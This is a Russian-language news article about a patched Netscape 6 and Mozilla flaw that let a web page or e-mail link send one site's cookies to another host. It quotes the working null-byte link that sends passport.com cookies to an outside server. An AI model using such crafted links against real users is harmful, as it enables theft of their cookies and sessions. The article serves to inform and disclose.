Алексей Рерих
В браузере Netscape Communicator обнаружена дыра, позволяющая злоумышленнику получить доступ к пользовательским cookies.
Уязвимое место, обнаруженное в Netscape, начиная с версии 6.0 и выше, аналогично дыре в браузере Mozilla версии 0.9.6 и более ранних, на движке которого создан последний Netscape.
И Netscape и Mozilla уже выпустили обновленные версии браузеров (Netscape 6.2.1 и Mozilla 0.9.7), в которых уязвимость устранена.
Сообщение об обнаружении уязвимого места помещено на сайте . Марк Слемко пишет в своем отчете, что для получения доступа к чужим cookies достаточно разместить на веб-странице или в электронном html-сообщении гиперссылку определенного вида. В результате оба браузера отсылают по указанному адресу cookies, предназначенные для совсем другого (любого другого) сайта.
В нормальной ситуации информация, сохраняемая в cookies, может быть прочитана только тем сервером, который ее записывал (или теми, в которых сервер кооперирован, то есть, находится в одном домене). Параметры браузера можно выставить таким образом, что cookies будет «отдаваться» только через безопасное SSL-соединение.
Однако обнаруженный Марком Слемко баг позволяет любому получать чужие cookies в обход всех этих защитный механизмов.
Баг был онаружен еще 15 ноября прошлого года. Тогда же Слемко отослал сообщение об обнаруженной дыре в Netscape и, после долгих поисков почтового адреса, разработчикам браузера Mozilla.
И только после того, как необходимые патчи и апгрейды были разработаны, Марк Слемко опубликовал информацию о дыре.
Собственно, сама дыра, по выражению самого Слемко, тривиальна: достаточно разместить на странице или в e-mail ссылку вида: http://alive.znep.com%00www.passport.com/cgi-bin/cookies. В результате клика по ссылке дырявые браузеры отошлют на сервер, адрес которого указан до %00, cookies предназначенные для сервера, адрес которого расположен после %00.
Несмотря на тривиальность исполнения, это нарушение безопасного соединения может привести к самым различным последствиям. Все зависит от того, какая информация о пользователе хранится на севере, доступ к cookies которого получен злоумышленником.
Аналогичные баги были не так давно обнаружены и в Microsoft Internet Explorer.
Скачать обновленную, залатанную версию барузеров можно на сайтах Netscape.com () и .
 |
|
| ССЫЛКИ ПО ТЕМЕ |  |
|
|
| МАТЕРИАЛЫ ПО ТЕМЕ | |
В Media Player спрятан шпион посильнее обычных cookies — 16.01.02
Дыра в IE позволяет подделать сертификат безопасности — 28.12.01
Европарламент одобрил запрещение cookies — 14.11.01
Новая дыра от Microsoft: ваши cookies может читать кто угодно — 12.11.01
Вячеслав Ансимов
«Рамблер» и SpyLOG готовы к IE 6, обрезающему cookies — 28.08.01
Netscape 6.1 beta: жизнь после смерти — 14.06.01
Вячеслав Ансимов
Netscape 6 — что это? — 17.11.00